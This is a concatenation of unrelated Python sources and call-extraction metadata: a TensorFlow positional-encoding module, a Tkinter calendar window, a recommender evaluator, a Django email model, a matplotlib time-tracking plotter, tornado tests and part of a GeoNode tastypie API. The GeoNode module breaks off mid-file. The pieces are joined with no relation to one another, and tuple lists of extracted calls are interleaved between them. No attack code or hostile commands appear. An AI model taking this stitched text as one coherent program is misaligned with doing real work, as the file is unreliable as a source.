[((773, 806), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3.5, 1.74, 0.896, 0.445]'], {}), '([3.5, 1.74, 0.896, 0.445])\n', (779, 806), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((826, 859), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065, -3.29]'], {}), '([1, -2.97, -1.065, -3.29])\n', (832, 859), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1284, 1317), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3.5, 1.74, 0.896, 0.445]'], {}), '([3.5, 1.74, 0.896, 0.445])\n', (1290, 1317), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1337, 1370), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065, -3.29]'], {}), '([1, -2.97, -1.065, -3.29])\n', (1343, 1370), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((578, 595), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 3, 4]'], {}), '([1, 3, 4])\n', (584, 595), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((692, 706), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 4]'], {}), '([1, 4])\n', (698, 706), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1049, 1075), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1055, 1075), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1214, 1231), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 3, 4]'], {}), '([1, 3, 4])\n', (1220, 1231), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1543, 1569), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1549, 1569), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((297, 311), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[3, 4]'], {}), '([3, 4])\n', (303, 311), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((390, 411), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[0.1, 4, 3.5]'], {}), '([0.1, 4, 3.5])\n', (396, 411), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((548, 562), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 2]'], {}), '([1, 2])\n', (554, 562), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((662, 676), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[2, 3]'], {}), '([2, 3])\n', (668, 676), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1007, 1033), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1013, 1033), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1193, 1207), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, 2]'], {}), '([1, 2])\n', (1199, 1207), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((1510, 1536), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[1, -2.97, -1.065]'], {}), '([1, -2.97, -1.065])\n', (1516, 1536), False, 'from homeworks.homework_1.task_1.vector import Vector\n'), ((216, 226), 'homeworks.homework_1.task_1.vector.Vector', 'Vector', (['[]'], {}), '([])\n', (222, 226), False, 'from homeworks.homework_1.task_1.vector import Vector\n')]
|
import numpy as np
import tensorflow as tf


class PositionalEncodings(tf.keras.Model):
    """Sinusoidal positional encoding generator.
    """
    def __init__(self, channels: int, presize: int = 128):
        """Initializer.
        Args:
            channels: size of the channels.
            presize: initial pe cache size.
        """
        super().__init__()
        self.channels = channels
        self.size = presize
        self.buffer = self.generate(presize)

    def call(self, size: int) -> tf.Tensor:
        """Return cached positional encodings.
        Args:
            size: length of the pe.
        Returns:
            [tf.float32; [T, C]], sinusoidal positional encodings.
        """
        if size <= self.size:
            return self.buffer[:size]
        # generate new cache
        self.size = size
        self.buffer = self.generate(size)
        return self.buffer

    def generate(self, size: int) -> tf.Tensor:
        """Generate positional encodings.
        Args:
            size: length of the pe.
        Returns:
            [tf.float32; [T, C]], sinusoidal positional encodings.
        """
        # [tf.int32; [T]]
        pos = tf.range(size)
        # [tf.int32; [C//2]]
        i = tf.range(0, self.channels, 2)
        # [C//2], cast to float32 before the exponential
        denom = tf.exp(-np.log(10000) * tf.cast(i / self.channels, tf.float32))
        # [T, C//2]
        context = tf.cast(pos, tf.float32)[:, None] * denom[None]
        # [T, C//2, 1]
        context = context[..., None]
        # [T, C//2, 2]
        pe = tf.concat([tf.sin(context), tf.cos(context)], axis=-1)
        # [T, C]
        pe = tf.reshape(pe, [size, self.channels])
        return pe
|
[
"tensorflow.range",
"tensorflow.sin",
"numpy.log",
"tensorflow.reshape",
"tensorflow.cast",
"tensorflow.cos"
] |
[((1155, 1169), 'tensorflow.range', 'tf.range', (['size'], {}), '(size)\n', (1163, 1169), True, 'import tensorflow as tf\n'), ((1211, 1240), 'tensorflow.range', 'tf.range', (['(0)', 'self.channels', '(2)'], {}), '(0, self.channels, 2)\n', (1219, 1240), True, 'import tensorflow as tf\n'), ((1626, 1663), 'tensorflow.reshape', 'tf.reshape', (['pe', '[size, self.channels]'], {}), '(pe, [size, self.channels])\n', (1636, 1663), True, 'import tensorflow as tf\n'), ((1319, 1357), 'tensorflow.cast', 'tf.cast', (['(i / self.channels)', 'tf.float32'], {}), '(i / self.channels, tf.float32)\n', (1326, 1357), True, 'import tensorflow as tf\n'), ((1397, 1421), 'tensorflow.cast', 'tf.cast', (['pos', 'tf.float32'], {}), '(pos, tf.float32)\n', (1404, 1421), True, 'import tensorflow as tf\n'), ((1552, 1567), 'tensorflow.sin', 'tf.sin', (['context'], {}), '(context)\n', (1558, 1567), True, 'import tensorflow as tf\n'), ((1569, 1584), 'tensorflow.cos', 'tf.cos', (['context'], {}), '(context)\n', (1575, 1584), True, 'import tensorflow as tf\n'), ((1303, 1316), 'numpy.log', 'np.log', (['(10000)'], {}), '(10000)\n', (1309, 1316), True, 'import numpy as np\n')]
|
from tkinter import *
from PIL import Image, ImageTk
import Utils
import MainGUI
def day_gui(day_date):
# Create the frame
root = Tk()
# Initialisation of some useful variables
last_click_x = 0
last_click_y = 0
root_width = 700
root_height = 400
# Definition of some useful functions
def get_picture(path, is_day_picture):
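# Day pictures are resized to fill the 700x350 picture area, with a "not found"
# placeholder when the image is missing; other resources are loaded as plain PhotoImages.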
if is_day_picture:
try:
picture = Image.open(Utils.get_resources_path("resources\\day\\day_" + str(day_date) + ".png"))
resized_picture = picture.resize((700, 350), Image.ANTIALIAS)
return ImageTk.PhotoImage(resized_picture)
except FileNotFoundError:
try:
return PhotoImage(file=Utils.get_resources_path("resources\\day\\not_found.png"))
except TclError:
pass
else:
try:
return PhotoImage(file=Utils.get_resources_path("resources\\" + path))
except TclError:
pass
def get_title(date):
if date == 1:
return "December 1st"
elif date == 2:
return "December 2nd"
elif date == 3:
return "December 3rd"
else:
return "December " + str(date) + "th"
def move_frame(event):
x, y = event.x - last_click_x + root.winfo_x(), event.y - last_click_y + root.winfo_y()
root.geometry("+%s+%s" % (x, y))
def mapped_frame(event):
root.overrideredirect(True)
def reduce_frame():
Utils.button_click_sound(False)
root.state('withdrawn')
root.overrideredirect(False)
root.state('iconic')
def close_frame():
Utils.button_click_sound(False)
root.destroy()
MainGUI.main_gui()
# Set basic parameters of frame
root.wm_attributes("-topmost", True)
root.geometry("700x400")
root.resizable(width=False, height=False)
root.iconbitmap(Utils.get_resources_path("resources\\icon\\app_icon.ico"))
root.bind("<Map>", mapped_frame)
# Add components to frame
label_background = Label(bg="white", width=700, height=400, bd=0)
label_background.place(x=0, y=0)
label_title = Label(text=get_title(day_date), font=("Segoe Script", 18), bd=0, bg="White")
label_title.place(x=root_width / 2 - label_title.winfo_reqwidth() / 2,
y=25 - label_title.winfo_reqheight() / 2)
label_move_area_picture = get_picture("day_move.png", False)
label_move_area = Label(image=label_move_area_picture, width=40, height=40, bd=0)
label_move_area.place(x=5, y=5)
label_move_area.bind("<B1-Motion>", move_frame)
button_reduce_picture = get_picture("buttons\\day_reduce.png", False)
button_reduce = Button(image=button_reduce_picture, bd=0, highlightthickness=0,
padx=40, pady=10, command=reduce_frame)
button_reduce.place(x=610, y=20)
button_close_picture = get_picture("buttons\\day_close.png", False)
button_close = Button(image=button_close_picture, bd=0, highlightthickness=0, padx=40, pady=40, command=close_frame)
button_close.place(x=655, y=5)
label_day_picture = get_picture(day_date, True)
label_day = Label(image=label_day_picture, width=700, height=350, bd=0)
label_day.place(x=0, y=50)
# Loop the frame
root.mainloop()
|
[
"PIL.ImageTk.PhotoImage",
"Utils.get_resources_path",
"Utils.button_click_sound",
"MainGUI.main_gui"
] |
[((1573, 1604), 'Utils.button_click_sound', 'Utils.button_click_sound', (['(False)'], {}), '(False)\n', (1597, 1604), False, 'import Utils\n'), ((1735, 1766), 'Utils.button_click_sound', 'Utils.button_click_sound', (['(False)'], {}), '(False)\n', (1759, 1766), False, 'import Utils\n'), ((1798, 1816), 'MainGUI.main_gui', 'MainGUI.main_gui', ([], {}), '()\n', (1814, 1816), False, 'import MainGUI\n'), ((1991, 2048), 'Utils.get_resources_path', 'Utils.get_resources_path', (['"""resources\\\\icon\\\\app_icon.ico"""'], {}), "('resources\\\\icon\\\\app_icon.ico')\n", (2015, 2048), False, 'import Utils\n'), ((624, 659), 'PIL.ImageTk.PhotoImage', 'ImageTk.PhotoImage', (['resized_picture'], {}), '(resized_picture)\n', (642, 659), False, 'from PIL import Image, ImageTk\n'), ((949, 995), 'Utils.get_resources_path', 'Utils.get_resources_path', (["('resources\\\\' + path)"], {}), "('resources\\\\' + path)\n", (973, 995), False, 'import Utils\n'), ((762, 819), 'Utils.get_resources_path', 'Utils.get_resources_path', (['"""resources\\\\day\\\\not_found.png"""'], {}), "('resources\\\\day\\\\not_found.png')\n", (786, 819), False, 'import Utils\n')]
|
class Evaluator(object):
"""
Compute metrics for recommendations that have been written to file.
Parameters
----------
compute_metrics : function(list,list)
The evaluation function which should accept two lists of predicted
and actual item indices.
max_items : int
The number of recommendations needed to compute the evaluation function.
"""
def __init__(self,compute_metrics,max_items):
self.compute_metrics = compute_metrics
self.max_items = max_items
def _add_metrics(self,predicted,actual):
metrics = self.compute_metrics(predicted,actual)
if metrics:
for m,val in metrics.iteritems():
self.cum_metrics[m] += val
self.count += 1
def process(self,testdata,recsfile,start,end,offset=1):
"""
Parameters
----------
testdata : scipy sparse matrix
The test items for each user.
recsfile : str
Filepath to the recommendations. The file should contain TSV
of the form: user, item, score. IMPORTANT: the recommendations must
be sorted by user and score.
start : int
First user to evaluate.
end: int
One after the last user to evaluate.
offset : int
Index offset for users and items in recommendations file.
Returns
-------
cum_metrics : dict
Aggregated metrics i.e. total values for all users.
count : int
The number of users for whom metrics were computed.
"""
from collections import defaultdict
self.cum_metrics = defaultdict(float)
self.count = 0
last_user = start
recs = []
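# The recommendations file is sorted by user, so metrics can be computed and
# flushed each time the user id changes.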
for line in open(recsfile):
user,item,score = line.strip().split('\t')
user = int(user)-1 # convert to 0-indexed
item = int(item)-1
if user >= end:
break
if user < start:
continue
if user != last_user:
self._add_metrics(recs,testdata[last_user,:].indices.tolist())
last_user = user
recs = []
if len(recs) < self.max_items:
recs.append(item)
self._add_metrics(recs,testdata[last_user,:].indices.tolist())
return self.cum_metrics,self.count
|
[
"collections.defaultdict"
] |
[((1684, 1702), 'collections.defaultdict', 'defaultdict', (['float'], {}), '(float)\n', (1695, 1702), False, 'from collections import defaultdict\n')]
|
from django.db.models import BooleanField, CharField, TextField

from wab.core.components.models import BaseModel


class EmailTemplate(BaseModel):
    code = CharField("Specific code for core app", max_length=50, blank=True, null=True, editable=False, unique=True)
    is_protected = BooleanField("Is protected", default=False)
    content = TextField("Html content")
|
[
"django.db.models.CharField",
"django.db.models.TextField",
"django.db.models.BooleanField"
] |
[((159, 270), 'django.db.models.CharField', 'CharField', (['"""Specific code for core app"""'], {'max_length': '(50)', 'blank': '(True)', 'null': '(True)', 'editable': '(False)', 'unique': '(True)'}), "('Specific code for core app', max_length=50, blank=True, null=\n True, editable=False, unique=True)\n", (168, 270), False, 'from django.db.models import BooleanField, CharField, TextField\n'), ((285, 328), 'django.db.models.BooleanField', 'BooleanField', (['"""Is protected"""'], {'default': '(False)'}), "('Is protected', default=False)\n", (297, 328), False, 'from django.db.models import BooleanField, CharField, TextField\n'), ((343, 368), 'django.db.models.TextField', 'TextField', (['"""Html content"""'], {}), "('Html content')\n", (352, 368), False, 'from django.db.models import BooleanField, CharField, TextField\n')]
|
#!/usr/bin/env python3
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Plot cumulative time based on daily time reporting data."""
from typing import List
from typing import Optional
from typing import Union
from datetime import date
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
import numpy as np
import pandas as pd
include_plot_title = True
save_plots = True
def load_csv(filename: str) -> np.array:
with open(filename, 'rb') as file:
return np.loadtxt(
file,
delimiter=',',
skiprows=1,
usecols=(0,1),
dtype=str,
)
def filter_data(data: np.array) -> np.array:
return np.array([d for d in data if d[0] not in ('', 'total')])
def convert_data(data: np.array) -> np.array:
return np.array([[date.fromisoformat(d[0]), float(d[1])] for d in data])
def add_zeroth_datapoint(data: np.array) -> np.array:
return np.vstack([[[data[0,0], 0.0]], data])
def data_to_cumsum(data: np.array, col: int = 1) -> np.array:
data[:,col] = np.cumsum(data[:,col])
return data
def get_data(filename: str):
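# Full pipeline: load the CSV, drop empty/'total' rows, parse dates,
# prepend a zero datapoint and turn daily hours into a cumulative sum.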
data = load_csv(filename)
data = filter_data(data)
data = convert_data(data)
data = add_zeroth_datapoint(data)
data = data_to_cumsum(data)
return data
def format_filename(string: str) -> str:
string = string.replace('(', '')
string = string.replace(')', '')
string = string.replace(' ', '_')
string = string.replace('\\', '')
return string.lower()
def plot_data(
data: np.array,
title: str,
major_formatter_str: str,
major_locator: Optional[mdates.RRuleLocator] = None,
yaxis_multiple_locator: Optional[int] = None,
colour: str = 'blue',
) -> None:
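# Plot a single cumulative-time series with a date-formatted x axis and
# optionally save PNG/SVG copies of the figure.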
fig, ax = plt.subplots(1, 1)
ax.plot(data[:,0], data[:,1], '-', color=colour)
if include_plot_title:
ax.set(title=title)
ax.set(ylabel='cumulative time (h)')
if major_locator:
ax.xaxis.set_major_locator(major_locator)
ax.xaxis.set_major_formatter(mdates.DateFormatter(major_formatter_str))
if yaxis_multiple_locator:
ax.yaxis.set_major_locator(ticker.MultipleLocator(yaxis_multiple_locator))
ax.set_ylim(0)
ax.grid()
fig.autofmt_xdate()
if save_plots:
filename = format_filename(title)
fig.savefig(f'{filename}.png', bbox_inches='tight')
fig.savefig(f'{filename}.svg', bbox_inches='tight')
def plot_data_compare(
data: List[np.array],
title: str,
legends: List[str],
major_formatter_str: str,
major_locator: Optional[mdates.RRuleLocator] = None,
yaxis_multiple_locator: Optional[int] = None,
colours: Union[str, List[str]] = 'blue',
) -> None:
fig, ax = plt.subplots(1, 1)
for i in range(len(data)):
colour = colours if isinstance(colours, str) else colours[i]
d = data[i]
ax.plot(d[:,0], d[:,1], '-', color=colour)
total_time = d[-1,1]
legends[i] = legends[i] + f' ({total_time:g} h)'
if include_plot_title:
ax.set(title=title)
ax.set(ylabel='cumulative time (h)')
if major_locator:
ax.xaxis.set_major_locator(major_locator)
ax.xaxis.set_major_formatter(mdates.DateFormatter(major_formatter_str))
if yaxis_multiple_locator:
ax.yaxis.set_major_locator(ticker.MultipleLocator(yaxis_multiple_locator))
ax.set_ylim(0)
ax.legend(legends)#, loc='center', bbox_to_anchor=(0.3, 0.8))
ax.grid()
fig.autofmt_xdate()
if save_plots:
filename = format_filename(title)
fig.savefig(f'{filename}.png', bbox_inches='tight')
fig.savefig(f'{filename}.svg', bbox_inches='tight')
def main():
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=14)
plt.rc('axes', titlesize=20)
plt.rc('legend', fontsize=14)
# Under File, Download -> Comma-separated values (.csv, current sheet),
# download the 'Time' and 'Blog' sheets
data_time = get_data('rmw_email time tracking - Code.csv')
data_blog = get_data('rmw_email time tracking - Blog.csv')
plot_data(
data_time,
'rmw\_email code time investment',
'%Y %B',
colour='green',
)
plot_data(
data_blog,
'rmw\_email blog post time investment',
'%Y-%b-%d',
mdates.DayLocator((1,5,10,15,20,25)),
yaxis_multiple_locator=5,
colour='blue',
)
plot_data_compare(
[data_time, data_blog],
'Overall rmw\_email time investment',
['code', 'blog post'],
'%Y %B',
colours=['green', 'blue'],
)
plt.show()
if __name__ == '__main__':
main()
|
[
"matplotlib.pyplot.show",
"matplotlib.dates.DayLocator",
"numpy.cumsum",
"matplotlib.dates.DateFormatter",
"datetime.date.fromisoformat",
"numpy.array",
"matplotlib.pyplot.rc",
"numpy.loadtxt",
"matplotlib.ticker.MultipleLocator",
"matplotlib.pyplot.subplots",
"numpy.vstack"
] |
[((1244, 1300), 'numpy.array', 'np.array', (["[d for d in data if d[0] not in ('', 'total')]"], {}), "([d for d in data if d[0] not in ('', 'total')])\n", (1252, 1300), True, 'import numpy as np\n'), ((1493, 1531), 'numpy.vstack', 'np.vstack', (['[[[data[0, 0], 0.0]], data]'], {}), '([[[data[0, 0], 0.0]], data])\n', (1502, 1531), True, 'import numpy as np\n'), ((1613, 1636), 'numpy.cumsum', 'np.cumsum', (['data[:, col]'], {}), '(data[:, col])\n', (1622, 1636), True, 'import numpy as np\n'), ((2318, 2336), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (2330, 2336), True, 'import matplotlib.pyplot as plt\n'), ((3287, 3305), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (3299, 3305), True, 'import matplotlib.pyplot as plt\n'), ((4246, 4273), 'matplotlib.pyplot.rc', 'plt.rc', (['"""text"""'], {'usetex': '(True)'}), "('text', usetex=True)\n", (4252, 4273), True, 'import matplotlib.pyplot as plt\n'), ((4278, 4317), 'matplotlib.pyplot.rc', 'plt.rc', (['"""font"""'], {'family': '"""serif"""', 'size': '(14)'}), "('font', family='serif', size=14)\n", (4284, 4317), True, 'import matplotlib.pyplot as plt\n'), ((4322, 4350), 'matplotlib.pyplot.rc', 'plt.rc', (['"""axes"""'], {'titlesize': '(20)'}), "('axes', titlesize=20)\n", (4328, 4350), True, 'import matplotlib.pyplot as plt\n'), ((4355, 4384), 'matplotlib.pyplot.rc', 'plt.rc', (['"""legend"""'], {'fontsize': '(14)'}), "('legend', fontsize=14)\n", (4361, 4384), True, 'import matplotlib.pyplot as plt\n'), ((5164, 5174), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5172, 5174), True, 'import matplotlib.pyplot as plt\n'), ((1045, 1115), 'numpy.loadtxt', 'np.loadtxt', (['file'], {'delimiter': '""","""', 'skiprows': '(1)', 'usecols': '(0, 1)', 'dtype': 'str'}), "(file, delimiter=',', skiprows=1, usecols=(0, 1), dtype=str)\n", (1055, 1115), True, 'import numpy as np\n'), ((2593, 2634), 'matplotlib.dates.DateFormatter', 'mdates.DateFormatter', (['major_formatter_str'], {}), '(major_formatter_str)\n', (2613, 2634), True, 'import matplotlib.dates as mdates\n'), ((3766, 3807), 'matplotlib.dates.DateFormatter', 'mdates.DateFormatter', (['major_formatter_str'], {}), '(major_formatter_str)\n', (3786, 3807), True, 'import matplotlib.dates as mdates\n'), ((4867, 4908), 'matplotlib.dates.DayLocator', 'mdates.DayLocator', (['(1, 5, 10, 15, 20, 25)'], {}), '((1, 5, 10, 15, 20, 25))\n', (4884, 4908), True, 'import matplotlib.dates as mdates\n'), ((2702, 2748), 'matplotlib.ticker.MultipleLocator', 'ticker.MultipleLocator', (['yaxis_multiple_locator'], {}), '(yaxis_multiple_locator)\n', (2724, 2748), True, 'import matplotlib.ticker as ticker\n'), ((3875, 3921), 'matplotlib.ticker.MultipleLocator', 'ticker.MultipleLocator', (['yaxis_multiple_locator'], {}), '(yaxis_multiple_locator)\n', (3897, 3921), True, 'import matplotlib.ticker as ticker\n'), ((1371, 1395), 'datetime.date.fromisoformat', 'date.fromisoformat', (['d[0]'], {}), '(d[0])\n', (1389, 1395), False, 'from datetime import date\n')]
|
import functools

import pytest
import tornado.ioloop
import tornado.web


class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write('Hello, world')


application = tornado.web.Application([
    (r'/', MainHandler),
    (r'/f00', MainHandler),
])


@pytest.fixture(scope='module')
def app():
    return application


def _fetch(http_client, url):
    return http_client.io_loop.run_sync(
        functools.partial(http_client.fetch, url))


def test_http_server(http_server):
    status = {'done': False}

    def _done():
        status['done'] = True
        http_server.io_loop.stop()

    http_server.io_loop.add_callback(_done)
    http_server.io_loop.start()
    assert status['done']


def test_http_client(http_client, base_url):
    request = http_client.fetch(base_url)
    request.add_done_callback(lambda future: http_client.io_loop.stop())
    http_client.io_loop.start()
    response = request.result()
    assert response.code == 200


def test_http_client_with_fetch_helper(http_client, base_url):
    response = _fetch(http_client, base_url)
    assert response.code == 200


@pytest.mark.gen_test
def test_http_client_with_gen_test(http_client, base_url):
    response = yield http_client.fetch(base_url)
    assert response.code == 200


@pytest.mark.gen_test
def test_get_url_with_path(http_client, base_url):
    response = yield http_client.fetch('%s/f00' % base_url)
    assert response.code == 200


@pytest.mark.gen_test
def test_http_client_raises_on_404(http_client, base_url):
    with pytest.raises(tornado.httpclient.HTTPError):
        yield http_client.fetch('%s/bar' % base_url)
|
[
"functools.partial",
"pytest.raises",
"pytest.fixture"
] |
[((276, 306), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (290, 306), False, 'import pytest\n'), ((422, 463), 'functools.partial', 'functools.partial', (['http_client.fetch', 'url'], {}), '(http_client.fetch, url)\n', (439, 463), False, 'import functools\n'), ((1542, 1585), 'pytest.raises', 'pytest.raises', (['tornado.httpclient.HTTPError'], {}), '(tornado.httpclient.HTTPError)\n', (1555, 1585), False, 'import pytest\n')]
|
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import re
import json
import logging
from django.urls import resolve
from django.db.models import Q
from django.http import HttpResponse
from django.conf import settings
from django.contrib.staticfiles.templatetags import staticfiles
from tastypie.authentication import MultiAuthentication, SessionAuthentication
from django.template.response import TemplateResponse
from tastypie import http
from tastypie.bundle import Bundle
from tastypie.constants import ALL, ALL_WITH_RELATIONS
from tastypie.resources import ModelResource
from tastypie import fields
from tastypie.utils import trailing_slash
from guardian.shortcuts import get_objects_for_user
from django.conf.urls import url
from django.core.paginator import Paginator, InvalidPage
from django.http import Http404
from django.core.exceptions import ObjectDoesNotExist
from django.forms.models import model_to_dict
from tastypie.utils.mime import build_content_type
from geonode import get_version, qgis_server, geoserver
from geonode.layers.models import Layer
from geonode.maps.models import Map
from geonode.documents.models import Document
from geonode.base.models import ResourceBase
from geonode.base.models import HierarchicalKeyword
from geonode.groups.models import GroupProfile
from geonode.utils import check_ogc_backend
from geonode.security.utils import get_visible_resources
from .authentication import OAuthAuthentication
from .authorization import GeoNodeAuthorization, GeonodeApiKeyAuthentication
from .api import (
TagResource,
RegionResource,
OwnersResource,
ThesaurusKeywordResource,
TopicCategoryResource,
GroupResource,
FILTER_TYPES)
from .paginator import CrossSiteXHRPaginator
from django.utils.translation import gettext as _
if settings.HAYSTACK_SEARCH:
from haystack.query import SearchQuerySet # noqa
logger = logging.getLogger(__name__)
LAYER_SUBTYPES = {
'vector': 'dataStore',
'raster': 'coverageStore',
'remote': 'remoteStore',
'vector_time': 'vectorTimeSeries',
}
FILTER_TYPES.update(LAYER_SUBTYPES)
class CommonMetaApi:
authorization = GeoNodeAuthorization()
allowed_methods = ['get']
filtering = {
'title': ALL,
'keywords': ALL_WITH_RELATIONS,
'tkeywords': ALL_WITH_RELATIONS,
'regions': ALL_WITH_RELATIONS,
'category': ALL_WITH_RELATIONS,
'group': ALL_WITH_RELATIONS,
'owner': ALL_WITH_RELATIONS,
'date': ALL,
'purpose': ALL,
'abstract': ALL
}
ordering = ['date', 'title', 'popular_count']
max_limit = None
class CommonModelApi(ModelResource):
keywords = fields.ToManyField(TagResource, 'keywords', null=True)
regions = fields.ToManyField(RegionResource, 'regions', null=True)
category = fields.ToOneField(
TopicCategoryResource,
'category',
null=True,
full=True)
group = fields.ToOneField(
GroupResource,
'group',
null=True,
full=True)
owner = fields.ToOneField(OwnersResource, 'owner', full=True)
tkeywords = fields.ToManyField(
ThesaurusKeywordResource, 'tkeywords', null=True)
VALUES = [
# fields in the db
'id',
'uuid',
'title',
'date',
'date_type',
'edition',
'purpose',
'maintenance_frequency',
'restriction_code_type',
'constraints_other',
'license',
'language',
'spatial_representation_type',
'temporal_extent_start',
'temporal_extent_end',
'data_quality_statement',
'abstract',
'csw_wkt_geometry',
'csw_type',
'owner__username',
'share_count',
'popular_count',
'srid',
'bbox_x0',
'bbox_x1',
'bbox_y0',
'bbox_y1',
'category__gn_description',
'supplemental_information',
'site_url',
'thumbnail_url',
'detail_url',
'rating',
'group__name',
'has_time',
'is_approved',
'is_published',
'dirty_state',
]
def build_filters(self, filters=None, ignore_bad_filters=False, **kwargs):
if filters is None:
filters = {}
orm_filters = super(CommonModelApi, self).build_filters(
filters=filters, ignore_bad_filters=ignore_bad_filters, **kwargs)
if 'type__in' in filters and filters['type__in'] in FILTER_TYPES.keys():
orm_filters.update({'type': filters.getlist('type__in')})
if 'app_type__in' in filters:
orm_filters.update({'polymorphic_ctype__model': filters['app_type__in'].lower()})
if 'extent' in filters:
orm_filters.update({'extent': filters['extent']})
orm_filters['f_method'] = filters['f_method'] if 'f_method' in filters else 'and'
if not settings.SEARCH_RESOURCES_EXTENDED:
return self._remove_additional_filters(orm_filters)
return orm_filters
def _remove_additional_filters(self, orm_filters):
orm_filters.pop('abstract__icontains', None)
orm_filters.pop('purpose__icontains', None)
orm_filters.pop('f_method', None)
return orm_filters
def apply_filters(self, request, applicable_filters):
types = applicable_filters.pop('type', None)
extent = applicable_filters.pop('extent', None)
keywords = applicable_filters.pop('keywords__slug__in', None)
filtering_method = applicable_filters.pop('f_method', 'and')
if filtering_method == 'or':
filters = Q()
for f in applicable_filters.items():
filters |= Q(f)
semi_filtered = self.get_object_list(request).filter(filters)
else:
semi_filtered = super(
CommonModelApi,
self).apply_filters(
request,
applicable_filters)
filtered = None
if types:
for the_type in types:
if the_type in LAYER_SUBTYPES.keys():
super_type = the_type
if 'vector_time' == the_type:
super_type = 'vector'
if filtered:
if 'time' in the_type:
filtered = filtered | semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type]).exclude(Layer___has_time=False)
else:
filtered = filtered | semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type])
else:
if 'time' in the_type:
filtered = semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type]).exclude(Layer___has_time=False)
else:
filtered = semi_filtered.filter(
Layer___storeType=LAYER_SUBTYPES[super_type])
else:
_type_filter = FILTER_TYPES[the_type].__name__.lower()
if filtered:
filtered = filtered | semi_filtered.filter(polymorphic_ctype__model=_type_filter)
else:
filtered = semi_filtered.filter(polymorphic_ctype__model=_type_filter)
else:
filtered = semi_filtered
if settings.RESOURCE_PUBLISHING or settings.ADMIN_MODERATE_UPLOADS:
filtered = self.filter_published(filtered, request)
if settings.GROUP_PRIVATE_RESOURCES:
filtered = self.filter_group(filtered, request)
if extent:
filtered = self.filter_bbox(filtered, extent)
if keywords:
filtered = self.filter_h_keywords(filtered, keywords)
# Hide Dirty State Resources
user = request.user if request else None
if not user or not user.is_superuser:
if user:
filtered = filtered.exclude(Q(dirty_state=True) & ~(
Q(owner__username__iexact=str(user))))
else:
filtered = filtered.exclude(Q(dirty_state=True))
return filtered
def filter_published(self, queryset, request):
filter_set = get_visible_resources(
queryset,
request.user if request else None,
request=request,
admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,
unpublished_not_visible=settings.RESOURCE_PUBLISHING)
return filter_set
def filter_group(self, queryset, request):
filter_set = get_visible_resources(
queryset,
request.user if request else None,
request=request,
private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)
return filter_set
def filter_h_keywords(self, queryset, keywords):
filtered = queryset
treeqs = HierarchicalKeyword.objects.none()
if keywords and len(keywords) > 0:
for keyword in keywords:
try:
kws = HierarchicalKeyword.objects.filter(
Q(name__iexact=keyword) | Q(slug__iexact=keyword))
for kw in kws:
treeqs = treeqs | HierarchicalKeyword.get_tree(kw)
except ObjectDoesNotExist:
# Ignore keywords not actually used?
pass
filtered = queryset.filter(Q(keywords__in=treeqs))
return filtered
